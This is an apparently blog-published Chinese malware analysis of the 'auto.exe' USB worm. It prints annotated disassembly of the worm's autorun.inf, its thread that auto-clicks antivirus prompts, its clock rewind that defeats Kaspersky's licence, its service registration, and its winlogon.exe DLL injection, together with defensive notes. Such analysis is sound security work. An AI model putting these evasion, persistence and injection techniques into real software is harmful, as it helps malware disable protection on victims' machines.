【作者】 cyclotron

【邮箱】 cyclotron at citiz.net

【主页】 http://cyclotron.yculblog.com

【背景】

    很久以前就听说有利用 Kaspersky 的 License 弱点来对付杀软的病毒出现,因为冲浪比较小心,一直未曾谋面,然而近日上网却不慎屡次正面交锋,虽然在影子系统的护航下系统免受其害,但又忍不住好奇细细解剖了一番,权作笔记,以飨饱受其苦的网友。
    病毒乍看起来没什么特别之处,主程序名为 auto.exe,通常会以隐藏文件的形式埋伏于每个盘的根目录下,辅以久负盛名的 autorun.inf,随着用户打开浏览器的操作悄悄渗入系统:
    
; autorun.inf as dropped next to the hidden auto.exe in each drive root.
; All three keys resolve to the same file, so opening the drive, double-clicking
; it, or picking the injected "Auto" context-menu verb all launch the dropper.
; Mitigation: disabling AutoRun for every drive type (NoDriveTypeAutoRun policy)
; makes this whole file inert.
[AutoRun]
open=auto.exe
shellexecute=auto.exe
shell\Auto\command=auto.exe

    脱掉主程序的 Upack 紧身衣,翻开代码故事的第一章:
    
0040216F ; WinMain of the dropper. The 41Ch-byte frame holds the path/name buffers,
0040216F ; a two-entry SERVICE_TABLE_ENTRYA, the OS platform id and a flag telling
0040216F ; whether this instance is the auto.exe in a drive root. Only excerpts of
0040216F ; the body are reproduced on this page.
0040216F _WinMain@16     proc near               ; CODE XREF: start+12Fp
0040216F
0040216F var_41C         = dword ptr -41Ch       ; service binary path buffer
0040216F lpVirusPathName = byte ptr -31Ch        ; own path from GetModuleFileNameA, later reduced to the drive root
0040216F var_VirusName   = dword ptr -21Ch       ; "auto.exe", assembled from string fragments
0040216F var_11C         = dword ptr -11Ch       ; per-machine base name (volume-serial derived, per the author)
0040216F ThreadId        = dword ptr -1Ch
0040216F ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -18h ; entry 0; var_10/var_C below are the NULL terminator entry
0040216F var_10          = dword ptr -10h
0040216F var_C           = dword ptr -0Ch
0040216F dwSysOpVer      = dword ptr -8          ; GetSystemVersion result, compared with VER_PLATFORM_WIN32_NT
0040216F var_SysInfectFlag= dword ptr -4         ; 1 when running as auto.exe from a drive root
0040216F arg_szCmdLine   = dword ptr  10h        ; searched for "-k" (service-started instance)
0040216F
0040216F                 push    ebp
00402170                 mov     ebp, esp
00402172                 sub     esp, 41Ch
00402178                 push    ebx
00402179                 push    esi
0040217A                 mov     esi, offset byte_410F20 ; esi = second sprintf argument (contents not shown)
0040217F                 push    edi
00402180                 mov     ebx, offset dword_410D4C ; ebx = structure that is zeroed next
00402185                 push    esi
00402186                 push    ebx
00402187                 call    sprintf         ; first of a run of sprintf calls that zero-initialise
00402187                                         ; the 32h dwords at 410D4C; the pushed arguments are
00402187                                         ; only popped later (add esp, 40h further down)

…………………………
…………………………

004023FE                 call    sprintf
00402403                 push    esi
00402404                 push    ebx
00402405                 call    sprintf         ; last of the zeroing sprintf run
0040240A                 call    GetSystemVersion ; get the OS platform id
0040240F                 mov     [ebp+dwSysOpVer], eax
00402412                 mov     al, ds:byte_410F20 ; first byte of the name buffer comes from byte_410F20
00402417                 push    3Fh
00402419                 mov     byte ptr [ebp+var_VirusName], al
0040241F                 pop     ecx             ; ecx = 3Fh dwords to clear
00402420                 xor     eax, eax
00402422                 lea     edi, [ebp+var_VirusName+1]
00402428                 push    esi             ; strcpy source = byte_410F20 (presumably an empty string here -- confirm)
00402429                 rep stosd               ; zero the rest of var_VirusName (3Fh*4 + 2 bytes)
0040242B                 stosw
0040242D                 lea     eax, [ebp+var_VirusName]
00402433                 push    eax
00402434                 call    strcpy          ; copy the name stub into var_VirusName
00402439                 lea     eax, [ebp+var_VirusName]
0040243F                 push    offset aAu      ; "au"
00402444                 push    eax
00402445                 call    strcat          ; "auto.exe" is built from the fragments "au", "to.e", "xe",
00402445                                         ; so the full name need not appear as one literal in the
00402445                                         ; binary -- string-based IoC scans should expect the pieces
0040244A                 lea     eax, [ebp+var_VirusName]
00402450                 push    offset aTo_e    ; "to.e"
00402455                 push    eax
00402456                 call    strcat
0040245B                 add     esp, 40h        ; pop the deferred sprintf/strcpy/strcat arguments
0040245E                 lea     eax, [ebp+var_VirusName]
00402464                 push    offset aXe      ; "xe"
00402469                 push    eax
0040246A                 call    strcat          ; var_VirusName is now "auto.exe"

【第一宗罪】 卡巴终结者

    大多数病毒为躲避杀软的追击,往往使出各种手段隐匿自身代码和文件,RootKit、多态变形等种种层出不穷。然而我们这里的主角面对卡巴毫无惧色,主动出击剿灭卡巴的进程和窗口,意欲一除之而后快,堂堂卡巴面对如此对手,也只能玩起 Tom&Jerry 的游戏,至少在笔者的电脑上,卡巴剿之不及,auto.exe大有春风吹又生之势。

0040246F                 pop     ecx             ; discard the two strcat arguments
00402470                 lea     eax, [ebp+ThreadId]
00402473                 pop     ecx
00402474                 push    eax             ; lpThreadId
00402475                 xor     eax, eax
00402477                 push    eax             ; dwCreationFlags = 0 (run immediately)
00402478                 push    eax             ; lpParameter = NULL
00402479                 push    offset lpAntiAVThread ; lpStartAddress: the AV-dialog watchdog shown below

{
  00402105
  00402105
  00402105 ; Thread procedure that never returns. Every ~2 s it enumerates windows
  00402105 ; (EnumFunc, not shown) and auto-confirms a dialog of class a32770 whose
  00402105 ; title is byte_410BB0 by synthesising a click on its "Yes" button.
  00402105 ; Defensive note: a process that polls EnumWindows/FindWindowExA at this
  00402105 ; rate and sends WM_LBUTTONDOWN/WM_LBUTTONUP to another process's dialog
  00402105 ; button is a strong behavioural indicator; it also means any AV prompt can
  00402105 ; be answered without the user, so a confirmation dialog alone is no defence.
  00402105 lpAntiAVThread  proc near
  00402106                 push    ebp
  00402107                 push    esi
  00402108                 mov     esi, ds:FindWindowExA
  0040210E                 push    edi
  0040210F                 mov     edi, ds:SendMessageA
  00402115                 xor     ebx, ebx        ; ebx = 0, used for every NULL/0 argument below (ebx is not saved, but the thread never returns)
  00402117
  00402117 loc_402117:
  00402117                 push    ebx             ; lParam
  00402118                 push    offset EnumFunc ; lpEnumFunc
  0040211D                 call    ds:EnumWindows  ; enumerate windows looking for the AV (EnumFunc not shown)
  00402123                 push    64h             ; dwMilliseconds = 100
  00402125                 call    ds:Sleep
  0040212B                 push    offset byte_410BB0 ; LPCSTR lpszWindow (dialog title, contents not shown)
  00402130                 push    offset a32770   ; LPCSTR lpszClass (presumably "#32770", the dialog class -- confirm)
  00402135                 push    ebx             ; HWND hwndChildAfter = NULL
  00402136                 push    ebx             ; HWND hwndParent = NULL (desktop)
  00402137                 call    esi ; FindWindowExA
  00402139                 cmp     eax, ebx
  0040213B                 jz      short loc_402162 ; no such dialog: sleep and retry
  0040213D                 push    offset aY       ; LPCSTR lpszWindow, the "是(&Y)" ("Yes") caption
  00402142                 push    offset aButton  ; LPCSTR lpszClass "Button"
  00402147                 push    ebx             ; HWND hwndChildAfter
  00402148                 push    eax             ; HWND hwndParent = the dialog
  00402149                 call    esi ; FindWindowExA ; locate the "是(&Y)" button
  0040214B                 push    ebx             ; lParam
  0040214C                 mov     ebp, eax        ; ebp = button HWND (not checked for NULL)
  0040214E                 push    1               ; wParam = MK_LBUTTON
  00402150                 push    WM_LBUTTONDOWN  ; Msg
  00402155                 push    ebp             ; hWnd
  00402156                 call    edi ; SendMessageA ; synthesise a mouse click on the button
  00402158                 push    ebx             ; lParam
  00402159                 push    ebx             ; wParam
  0040215A                 push    WM_LBUTTONUP    ; Msg
  0040215F                 push    ebp             ; hWnd
  00402160                 call    edi ; SendMessageA
  00402162
  00402162 loc_402162:
  00402162                 push    7D0h            ; dwMilliseconds = 2000
  00402167                 call    ds:Sleep
  0040216D                 jmp     short loc_402117 ; loop forever: the watchdog lives as long as the process
  0040216D lpAntiAVThread  endp                    ; as soon as the AV shows a prompt it is dismissed
}

0040247E                 push    eax             ; dwStackSize = 0 (default)
0040247F                 push    eax             ; lpThreadAttributes = NULL
00402480                 call    ds:CreateThread ; start the anti-AV watchdog thread; the handle in eax is not used in this fragment
00402486                 mov     edi, ds:Sleep   ; edi = Sleep (reused below)
0040248C                 push    3E8h            ; dwMilliseconds = 1000
00402491                 call    edi ; Sleep
00402493                 and     [ebp+var_SysInfectFlag], 0 ; default: not (yet known to be) the drive-root auto.exe
00402497                 push    esi


00402758                 push    offset aDd33gsd2 ; "dd33gsd2" -- strcpy destination. The literal is only IDA's
00402758                                         ; name for a global buffer holding THIS machine's volume-serial
00402758                                         ; derived name; it differs per infected host, so hunt on the
00402758                                         ; behaviour (service name == basename of the dropped <name>.exe
00402758                                         ; and <name>.dll in the system directory), not on this string
0040275D                 call    strcpy
00402762                 lea     eax, [ebp+var_11C]
00402768                 push    eax
00402769                 lea     eax, [ebp+var_11C]
0040276F                 push    eax
00402770                 call    sub_402E93      ; in-place transform of var_11C (src == dst); semantics not shown
00402775                 lea     eax, [ebp+var_11C]
0040277B                 push    eax
0040277C                 push    offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
00402781                 call    strcpy          ; global <name>.exe buffer = var_11C
00402786                 push    offset a_exe    ; ".EXE"
0040278B                 push    offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
00402790                 call    strcat          ; append ".EXE": the exe is named after the VolumeSerialNumber
00402795                 lea     eax, [ebp+var_11C]
0040279B                 push    eax
0040279C                 lea     eax, [ebp+var_11C]
004027A2                 push    eax
004027A3                 call    sub_402E93      ; second in-place transform of var_11C
004027A8                 add     esp, 28h        ; pop the deferred arguments
004027AB                 push    1               ; dwMilliseconds
004027AD                 call    edi ; Sleep
004027AF                 lea     eax, [ebp+var_11C]
004027B5                 push    eax
004027B6                 push    offset aDd33gsd2_dll ; "dd33gsd2.dll"
004027BB                 call    strcpy          ; global <name>.dll buffer = var_11C
004027C0                 push    offset a_dll    ; ".DLL"
004027C5                 push    offset aDd33gsd2_dll ; "dd33gsd2.dll"
004027CA                 call    strcat          ; append ".DLL": the dll is named after the VolumeSerialNumber
004027CF                 add     esp, 10h
004027D2                 lea     eax, [ebp+var_11C]
004027D8                 push    eax
004027D9                 push    offset dword_410E1C
004027DE                 call    ds:lstrcpy      ; dword_410E1C = bare <name> (later passed to RegisterVirusService)


【第二宗罪】 主动开启浏览器,放行autorun.inf

    autorun.inf 并不是本文主角的专利,早在春秋战国时期就已经成为各路病毒愚弄菜菜的常备武器。然而在大家都是静候菜菜插入优盘,打开浏览器之时,auto.exe 却再次主动出击,迫不及待地打开浏览器,为 autorun.inf 开路。

0040281C                 lea     eax, [ebp+lpVirusPathName]
00402822                 push    104h            ; nSize = MAX_PATH
00402827                 push    eax             ; lpFilename
00402828                 push    0               ; hModule = NULL (this executable)
0040282A                 call    ds:GetModuleFileNameA ; get the dropper's own full path
00402830                 test    eax, eax
00402832                 jnz     short loc_40283C
00402834                 push    1
00402836                 pop     eax             ; eax = 1: exit code for "could not get own path"
00402837                 jmp     loc_402C04      ; -> common exit (not shown)
0040283C ; ----------------------------------------------------------------------------
0040283C
0040283C loc_40283C:                             ; CODE XREF: WinMain(x,x,x,x)+6C3j
0040283C                 lea     eax, [ebp+var_VirusName]
00402842                 push    eax
00402843                 lea     eax, [ebp+lpVirusPathName]
00402849                 push    eax
0040284A                 call    strstr          ; does the own path contain "auto.exe"?
0040284F                 pop     ecx
00402850                 test    eax, eax
00402852                 pop     ecx             ; pop does not touch flags, so the test result survives
00402853                 jz      short loc_4028A7 ; emmm...
00402853                                         ; not found: this instance is not the auto.exe in a drive root,
00402853                                         ; i.e. it is already the copy living in the system directory
00402855                 lea     eax, [ebp+lpVirusPathName]
0040285B                 push    eax
0040285C                 call    strlen
00402861                 cmp     eax, 2
00402864                 pop     ecx
00402865                 jbe     short loc_4028A7 ; path shorter than "X:\" -- nothing to open
00402867                 movsx   eax, [ebp+lpVirusPathName] ; eax = drive letter (first char of own path)
0040286E                 push    eax
0040286F                 lea     eax, [ebp+lpVirusPathName]
00402875                 push    offset aC       ; "%c:\\"
0040287A                 push    eax
0040287B                 mov     [ebp+var_SysInfectFlag], 1 ; remember: running as auto.exe from a drive root
00402882                 call    sprintf         ; overwrite own path with its drive root, e.g. "C:\"
00402887                 add     esp, 0Ch
0040288A                 lea     eax, [ebp+lpVirusPathName]
00402890                 push    1               ; nShowCmd = SW_SHOWNORMAL
00402892                 push    0               ; lpDirectory
00402894                 push    eax             ; lpParameters = the drive root
00402895                 push    offset aExplorer_exe ; lpFile
0040289A                 push    offset aOpen    ; lpOperation
0040289F                 push    0               ; hwnd
004028A1                 call    ds:ShellExecuteA ; open the drive root with Explorer.exe; because
004028A1                                         ; autorun.inf is there, auto.exe gets launched again.
004028A1                                         ; This relies on AutoRun being honoured for that drive,
004028A1                                         ; so disabling AutoRun for all drive types neutralises it

【第三宗罪】 时光倒流

    这一招可是再次刺痛了卡巴的要害。。。(卡巴:auto 啊 auto,我俩本无瓜葛,你为何就如此针对我捏? >.<)

004028A7 loc_4028A7:                             ; reached by fall-through and when the own path lacks "auto.exe"
004028A7 
004028A7                 call    FoolKaspersky   ; rewind the clock if avp.exe is running (see below); the result is not checked

{
  00401000 ; int FoolKaspersky(void)
  00401000 ; Returns -1 when no avp.exe process exists. Otherwise, if the system clock
  00401000 ; is past 2005, sets the year back to 2005 (per the author this expires the
  00401000 ; AVP licence), sleeps 20 s and returns 1.
  00401000 ; Defensive note: a sudden clock jump to 2005 and, where auditing is on, a
  00401000 ; system-time-changed event (Security 4616) are the observable symptoms.
  00401000 FoolKaspersky   proc near
  00401000
  00401000 SystemTime      = SYSTEMTIME ptr -10h
  00401000
  00401000                 push    ebp
  00401001                 mov     ebp, esp
  00401003                 sub     esp, 10h
  00401006                 push    esi
  …………………………
  …………………………
  00401298                 push    offset aAvp_exe ; "avp.exe"
  0040129D                 call    CountAVP        ; count processes named avp.exe (Kaspersky)
  004012A2                 add     esp, 2Ch
  004012A5                 test    eax, eax
  004012A7                 pop     edi             ; pop/pop do not alter flags...
  004012A8                 pop     esi
  004012A9                 jg      short loc_4012B0 ; ...so this still tests the count: > 0 means AVP is
  004012A9                                         ; running, and the system time gets rewound to break its licence
  004012AB                 or      eax, 0FFFFFFFFh ; eax = -1: no AVP process
  004012AE                 leave
  004012AF                 retn
  004012B0 ; ----------------------------------------------------------------------------
  004012B0
  004012B0 loc_4012B0: 
  004012B0                 lea     eax, [ebp+SystemTime] ; AVP is running:
  004012B0                                         ; rewind the system time to break the AVP licence
  004012B3                 push    eax             ; lpSystemTime
  004012B4                 call    ds:GetSystemTime
  004012BA                 cmp     [ebp+SystemTime.wYear], 7D5h ; 7D5h = 2005
  004012C0                 jbe     short loc_4012D2 ; already 2005 or earlier: leave the clock alone
  004012C2                 lea     eax, [ebp+SystemTime]
  004012C5                 mov     [ebp+SystemTime.wYear], 7D5h ; only the year changes; month/day/time are kept
  004012CB                 push    eax             ; lpSystemTime
  004012CC                 call    ds:SetSystemTime ; needs SeSystemtimePrivilege; result not checked
  004012D2
  004012D2 loc_4012D2:
  004012D2                 push    4E20h           ; dwMilliseconds = 20000
  004012D7                 call    ds:Sleep
  004012DD                 push    1
  004012DF                 pop     eax             ; eax = 1
  004012E0                 leave
  004012E1                 retn
  004012E1 FoolKaspersky   endp
}

004028AC                 cmp     [ebp+dwSysOpVer], VER_PLATFORM_WIN32_NT
004028B0                 jnz     loc_402BEF      ; not NT (Win9x): the service/injection part below is skipped
004028B6                 push    0FFh            ; count
004028BB                 lea     eax, [ebp+var_41C]
004028C1                 push    0               ; value
004028C3                 push    eax             ; dest
004028C4                 call    memset          ; zero-fill var_41C (the service binary path buffer)

【第四宗罪】 伪装系统服务派发员

    auto.exe 不是街头混混,出手如此大气,足见其志在高远。只可惜笔者这块内容生疏,回头恶补 MSDN 再奉上。。。

004028BB                 lea     eax, [ebp+var_41C] ; (the memset tail is repeated from the previous excerpt)
004028C1                 push    0
004028C3                 push    eax
004028C4                 call    memset          ; zero-fill
004028C9                 add     esp, 0Ch
004028CC                 lea     eax, [ebp+var_41C]
004028D2                 push    offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
004028D7                 push    eax
004028D8                 call    ds:lstrcpy      ; var_41C = the [VolumeSerialNumber].exe name
004028D8                                         ; generated earlier
004028DE                 lea     eax, [ebp+var_41C]
004028E4                 push    1
004028E6                 push    eax
004028E7                 call    CopySelfToSysDir_As_VSNexe ;
004028E7                                         ; copy self into the system directory as
004028E7                                         ; [VolumeSerialNumber].exe (body not shown)
004028EC                 push    offset aK       ; "-k"
004028F1                 push    [ebp+arg_szCmdLine]
004028F4                 call    strstr          ; was the process started with a "-k" argument?
004028F9                 add     esp, 10h
004028FC                 test    eax, eax
004028FE                 jz      loc_402BB1      ; no "-k": first run -> go register the service.
004028FE                                         ; (loc_402BB1 appends " -k" to the binary path before
004028FE                                         ; RegisterVirusService, so the instance the SCM later
004028FE                                         ; starts takes the fall-through path here)
00402904                 xor     edi, edi        ; "-k" present: started by the SCM, so hand the
00402904                                         ; main thread to the service control dispatcher
00402906                 push    esi
00402907                 push    ebx
00402908                 mov     [ebp+ServiceStartTable.lpServiceName], offset aDd33gsd2_1 ; "dd33gsd2"
0040290F                 mov     [ebp+ServiceStartTable.lpServiceProc], offset VirusServiceProc
{
  004019D1 ; ServiceMain for the "dd33gsd2" service: registers the control handler,
  004019D1 ; reports SERVICE_RUNNING, starts InjectDll2Winlogon on a thread, waits for
  004019D1 ; it to signal through dword_410F1C, then reports status in a loop.
  004019D1 ; Locals are esp-relative (no frame pointer); ebp appears to hold 0
  004019D1 ; throughout (its zeroing is in the elided part -- confirm).
  004019D1 VirusServiceProc proc near
  004019D1
  004019D1 ThreadId        = dword ptr -108h
  004019D1 ServiceName     = byte ptr -104h
  …………………………
  …………………………
  00401CA5                 push    40h
  00401CA7                 mov     [esp+144h+ServiceName], al ; first byte of ServiceName
  00401CAB                 pop     ecx             ; ecx = 40h dwords to clear
  00401CAC                 xor     eax, eax
  00401CAE                 lea     edi, [esp+3Dh]  ; = ServiceName+1 at the current esp displacement
  00401CB2                 rep stosd               ; zero the remaining 40h*4 + 2 + 1 bytes
  00401CB4                 stosw
  00401CB6                 stosb
  00401CB7                 lea     eax, [esp+140h+ServiceName]
  00401CBB                 push    offset aDd33gsd2_1 ; "dd33gsd2"
  00401CC0                 push    eax
  00401CC1                 call    strcpy          ; ServiceName = "dd33gsd2"
  00401CC6                 add     esp, 30h
  00401CC9                 lea     eax, [esp+118h+ServiceName]
  00401CCD                 push    offset HandlerProc ; lpHandlerProc (not shown)
  00401CD2                 push    eax             ; lpServiceName
  00401CD3                 call    ds:RegisterServiceCtrlHandlerA
  00401CD9                 mov     ds:hServiceStatus, eax
  00401CDE                 call    ds:GetLastError ; result discarded (eax is reloaded on the next line)
  00401CE4                 mov     eax, ds:hServiceStatus
  00401CE9                 cmp     eax, ebp        ; registration failed (handle == 0)?
  00401CEB                 jz      loc_40200D      ; -> bail out without ever reporting a status
  00401CF1                 mov     edi, ds:SetServiceStatus
  00401CF7                 push    offset stru_410D30 ; lpServiceStatus
  00401CFC                 push    eax             ; hServiceStatus
  00401CFD                 mov     ds:stru_410D30.dwCurrentState, 4 ; 4 = SERVICE_RUNNING
  00401D07                 call    edi ; SetServiceStatus
  …………………………
  …………………………
  00401F8F                 lea     eax, [esp+118h+ThreadId]
  00401F93                 push    eax             ; lpThreadId
  00401F94                 push    ebp             ; dwCreationFlags = 0
  00401F95                 push    ebp             ; lpParameter = NULL
  00401F96                 push    offset InjectDll2Winlogon ; lpStartAddress: drops the DLL and injects winlogon.exe
  00401F9B                 push    ebp             ; dwStackSize
  00401F9C                 push    ebp             ; lpThreadAttributes
  00401F9D                 call    ds:CreateThread ; the thread handle in eax is not saved
  00401FA3                 cmp     ds:dword_410F1C, ebp ; dword_410F1C is the "injection thread finished"
  00401FA3                                         ; flag, set to 1 by InjectDll2Winlogon
  00401FA9                 mov     esi, ds:Sleep
  00401FAF                 push    1
  00401FB1                 pop     ebx             ; ebx = 1
  00401FB2                 jnz     short loc_401FC6 ; already set: skip the wait
  00401FB4
  00401FB4 loc_401FB4:
  00401FB4                 push    ebx             ; dwMilliseconds = 1
  00401FB5                 call    esi ; Sleep
  00401FB7                 push    12Ch            ; dwMilliseconds = 300
  00401FBC                 call    esi ; Sleep
  00401FBE                 cmp     ds:dword_410F1C, ebp
  00401FC4                 jz      short loc_401FB4 ; poll until the injection thread signals
  00401FC6
  00401FC6 loc_401FC6:
  00401FC6                 cmp     ds:stru_410D30.dwCurrentState, 4 ; still SERVICE_RUNNING?
  00401FCD                 jnz     short loc_40200D
  00401FCF                 push    offset stru_410D30 ; lpServiceStatus
  00401FD4                 mov     ds:stru_410D30.dwServiceType, 110h ; SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS
  00401FDE                 push    ds:hServiceStatus ; hServiceStatus
  00401FE4                 mov     ds:stru_410D30.dwCurrentState, ebx ; 1 = SERVICE_STOPPED
  00401FEA                 mov     ds:stru_410D30.dwControlsAccepted, ebx ; 1 = SERVICE_ACCEPT_STOP
  00401FF0                 mov     ds:stru_410D30.dwWin32ExitCode, ebp ; 0
  00401FF6                 mov     ds:stru_410D30.dwCheckPoint, ebp
  00401FFC                 mov     ds:stru_410D30.dwWaitHint, ebp
  00402002                 call    edi ; SetServiceStatus ; reports STOPPED to the SCM
  00402004                 push    7530h           ; dwMilliseconds = 30000
  00402009                 call    esi ; Sleep
  0040200B                 jmp     short loc_401FC6 ; on the next pass dwCurrentState is 1, so this falls
  0040200B                                         ; out to loc_40200D unless HandlerProc (not shown) has
  0040200B                                         ; set it back to 4 in the meantime
  0040200D ; ----------------------------------------------------------------------------
  0040200D
  0040200D loc_40200D:
  0040200D                 pop     edi
  0040200E                 pop     esi
  0040200F                 pop     ebp
  00402010                 pop     ebx
  00402011                 add     esp, 108h
  00402017                 retn
  00402017 VirusServiceProc endp
}
00402916                 mov     [ebp+var_10], edi ; edi is 0 here (xor edi, edi at 00402904): these two
00402919                 mov     [ebp+var_C], edi ; dwords are the {NULL, NULL} terminator entry of ServiceStartTable
…………………………
…………………………
00402BA0                 lea     eax, [ebp+ServiceStartTable]
00402BA3                 push    eax             ; lpServiceStartTable
00402BA4                 call    ds:StartServiceCtrlDispatcherA ; connect this thread to the SCM; VirusServiceProc runs as ServiceMain
00402BAA                 neg     eax             ; CF = (eax != 0)
00402BAC                 sbb     eax, eax        ; eax = -1 if the call returned nonzero (success), 0 if it failed
00402BAE                 inc     eax             ; eax = 0 on success, 1 if the dispatcher call failed
00402BAF                 jmp     short loc_402C04 ; -> common exit

【第五宗罪】  注入系统进程,Hook 无处不在

    在上面的 ServiceDispatcher 中,最辣手的一招绝非伪装派遣本身,而是隐含在其中的远程代码注入,auto.exe 的病毒体中附带了一个真正用来干坏事的Dll,在伪装派遣的过程中以卷标号命名,被释放到系统目录下,当然同时被释放过去的还有病毒体本身,一搭一挡构成了下面注册系统服务的文件。在清除的过程中,最难对付的非该Dll莫属。一旦被注册到系统服务,该Dll就会注入到大量的系统进程中,随时监视和刷新对它不利的操作,在该Dll被释放之前,任何对其注册表项的修改都会遭到即时反攻,令对手除之而不能。
    
0040183D ; DWORD __stdcall InjectDll2Winlogon(LPVOID)
0040183D ; Thread started by VirusServiceProc. Writes the embedded DLL image
0040183D ; (0B000h bytes at byte_405010) to <SystemDir>\dd33gsd2.dll, on NT injects
0040183D ; it into winlogon.exe, then signals completion by setting dword_410F1C = 1.
0040183D ; The LPVOID argument is never read and the return value is not set
0040183D ; deliberately.
0040183D ; Defensive notes: the dropped DLL has a fixed size of 0B000h (45056) bytes
0040183D ; and shares its base name with the service and the dropped .exe; a
0040183D ; non-Microsoft DLL loaded inside winlogon.exe is the persistent symptom.
0040183D InjectDll2Winlogon proc near
0040183D
0040183D var_szExeName   = dword ptr -308h       ; <SystemDir>\dd33gsd2.exe (built but not used in this function)
0040183D var_szSysDir    = byte ptr -208h
0040183D var_szDllName   = byte ptr -108h        ; <SystemDir>\dd33gsd2.dll
0040183D NumberOfBytesWritten= dword ptr -8
0040183D var_OpSysVer    = dword ptr -4
0040183D
0040183D                 push    ebp
0040183E                 mov     ebp, esp
00401840                 sub     esp, 308h
00401846                 push    esi
00401847                 push    edi
00401848                 call    GetSystemVersion
0040184D                 mov     esi, ds:GetSystemDirectoryA
00401853                 mov     [ebp+var_OpSysVer], eax
00401856                 mov     edi, 0FFh       ; edi = buffer size for GetSystemDirectoryA
0040185B                 lea     eax, [ebp+var_szSysDir]
00401861                 push    edi             ; uSize
00401862                 push    eax             ; lpBuffer
00401863                 call    esi ; GetSystemDirectoryA
00401865                 test    eax, eax
00401867                 jz      loc_401974      ; failed: return without dropping anything
0040186D                 lea     eax, [ebp+var_szSysDir]
00401873                 push    edi             ; uSize
00401874                 push    eax             ; lpBuffer
00401875                 call    esi ; GetSystemDirectoryA ; second call with identical arguments (redundant)
00401877                 test    eax, eax
00401879                 jz      loc_401974
0040187F                 lea     eax, [ebp+var_szSysDir]
00401885                 push    eax
00401886                 lea     eax, [ebp+var_szDllName]
0040188C                 push    eax
0040188D                 call    strcpy          ; szDllName = SystemDir
00401892                 mov     esi, offset asc_410B74 ; "\\"
00401897                 lea     eax, [ebp+var_szDllName]
0040189D                 push    esi
0040189E                 push    eax
0040189F                 call    strcat          ; szDllName += "\"
004018A4                 lea     eax, [ebp+var_szDllName]
004018AA                 push    offset aDd33gsd2_dll ; "dd33gsd2.dll"
004018AF                 push    eax
004018B0                 call    strcat          ; szDllName += "<name>.dll"
004018B5                 add     esp, 18h
004018B8                 lea     eax, [ebp+var_szSysDir]
004018BE                 push    eax
004018BF                 lea     eax, [ebp+var_szExeName]
004018C5                 push    eax
004018C6                 call    ds:lstrcpy      ; szExeName = SystemDir
004018CC                 lea     eax, [ebp+var_szExeName]
004018D2                 push    esi
004018D3                 push    eax
004018D4                 call    strcat          ; szExeName += "\"
004018D9                 lea     eax, [ebp+var_szExeName]
004018DF                 push    offset aDd33gsd2_exe ; "dd33gsd2.exe"
004018E4                 push    eax
004018E5                 call    strcat          ; szExeName += "<name>.exe" -- not referenced again below
004018EA                 add     esp, 10h
004018ED                 xor     edi, edi        ; edi = 0 for the NULL/0 arguments that follow
004018EF                 lea     eax, [ebp+var_szDllName]
004018F5                 push    edi             ; hTemplateFile
004018F6                 push    edi             ; dwFlagsAndAttributes
004018F7                 push    2               ; dwCreationDisposition = CREATE_ALWAYS (overwrites an existing DLL)
004018F9                 push    edi             ; lpSecurityAttributes
004018FA                 push    edi             ; dwShareMode = 0 (exclusive)
004018FB                 push    40000000h       ; dwDesiredAccess = GENERIC_WRITE
00401900                 push    eax             ; lpFileName
00401901                 call    ds:CreateFileA
00401907                 mov     esi, eax
00401909                 cmp     esi, 0FFFFFFFFh ; INVALID_HANDLE_VALUE?
0040190C                 jz      short loc_401924 ; note: the failure path still calls CloseHandle(-1)
0040190E                 lea     eax, [ebp+NumberOfBytesWritten]
00401911                 push    edi             ; lpOverlapped
00401912                 push    eax             ; lpNumberOfBytesWritten (never compared with 0B000h)
00401913                 push    0B000h          ; nNumberOfBytesToWrite = 45056: fixed size of the embedded DLL
00401918                 push    offset byte_405010 ; lpBuffer: the DLL image carried inside the dropper
0040191D                 push    esi             ; hFile
0040191E                 call    ds:WriteFile    ; create [VolumeSerialNumber].dll; return value not checked
00401924
00401924 loc_401924:
00401924                 push    ebx             ; saved only on this path (popped at 00401973)
00401925                 push    esi             ; hObject
00401926                 call    ds:CloseHandle
0040192C                 cmp     [ebp+var_OpSysVer], VER_PLATFORM_WIN32_NT
00401930                 mov     esi, ds:Sleep
00401936                 push    1
00401938                 mov     edi, 0BB8h      ; edi = 3000 ms
0040193D                 pop     ebx             ; ebx = 1 (the value stored to dword_410F1C below); flags still from the cmp
0040193E                 jnz     short loc_40196A ; Win9x: no injection, just sleep and signal
00401940                 push    0
00401942                 push    offset aWinlogon_exe ; "winlogon.exe"
00401947                 call    FindSpecificProcess ; find the winlogon.exe process (body not shown)
0040194C                 pop     ecx
0040194D                 test    eax, eax
0040194F                 pop     ecx
00401950                 jz      short loc_401961 ; not found: skip injection
00401952                 push    eax             ; result of FindSpecificProcess (presumably a PID or handle -- confirm)
00401953                 lea     eax, [ebp+var_szDllName]
00401959                 push    eax
0040195A                 call    Inject_winlogon_exe ; load [VolumeSerialNumber].dll into winlogon.exe (body not shown)
0040195F                 pop     ecx
00401960                 pop     ecx
00401961
00401961 loc_401961:
00401961                 push    edi             ; dwMilliseconds = 3000
00401962                 call    esi ; Sleep
00401964                 mov     ds:dword_410F1C, ebx ; signal VirusServiceProc that the injection step is done
00401964                                         ; (falls into loc_40196A, so the sleep and the store happen twice)
0040196A
0040196A loc_40196A:
0040196A                 push    edi             ; dwMilliseconds = 3000
0040196B                 call    esi ; Sleep
0040196D                 mov     ds:dword_410F1C, ebx ; signal VirusServiceProc: done
00401973                 pop     ebx
00401974
00401974 loc_401974:
00401974                 pop     edi
00401975                 pop     esi
00401976                 leave
00401977                 retn                    ; plain retn despite the one stdcall argument; harmless for a
00401977                                         ; thread procedure, since the thread ends when this returns
00401977 InjectDll2Winlogon endp


【第六宗罪】  注册系统服务,启动无影无踪

    前面说道 auto.exe 志存高远,早已放弃同行广泛采用的自启动,而改用系统服务的方式深深侵入到系统的脊髓,加上远程注入Dll全程护航,普通的清除方式已经难以奏效。在被感染的系统中,系统服务列表中会增加一项以卷标号命名的自启动服务,其支持者恰为前面释放到系统目录的病毒体和Dll。

00402BB1
00402BB1 loc_402BB1:                             ; first run (no "-k" on the command line): register the service
00402BB1                 lea     eax, [ebp+var_41C]
00402BB7                 push    offset aK_0     ; " -k"
00402BBC                 push    eax
00402BBD                 call    ds:lstrcat      ; var_41C = "<name>.exe -k" (possibly prefixed with the
00402BBD                                         ; system directory by CopySelfToSysDir_As_VSNexe -- confirm).
